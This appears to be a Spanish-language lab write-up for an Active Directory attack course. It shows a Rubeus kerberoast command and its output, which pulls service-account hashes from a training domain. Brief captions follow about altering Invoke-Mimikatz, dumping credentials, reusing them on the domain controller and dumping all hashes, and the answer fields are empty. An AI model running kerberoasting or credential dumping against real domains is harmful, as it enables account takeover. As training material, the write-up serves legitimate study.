Learning Objective - 7

Process using svcadmin as service account

PS C:\AD\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 2


[*] SamAccountName         : websvc
[*] DistinguishedName      : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet             : 11/14/2022 4:42:13 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast


[*] SamAccountName         : svcadmin
[*] DistinguishedName      : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet             : 11/14/2022 9:06:37 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast

[*] Roasted hashes written to : C:\AD\Tools\hashes.kerberoast

:c

Pero...

Entonces, como tenemos la credenciales intentamos:

Respuesta:

NTLM hash of svcadmin account

Respuesta:

NTLM hash of srvadmin extracted from dcorp-adminsrv

Verificando el LanguageMode

Agregamos una linea dentro del script Invoke-Mimikatz.ps1.

Luego ejecutamos el Mimikatz y respondemos las flags.

Probamos las nuevas creds.

Obtenemos la IP del dominio.

Probamos las creds en el DC.

Y dumpeamos todos los hashes.

Respuesta:

Last updated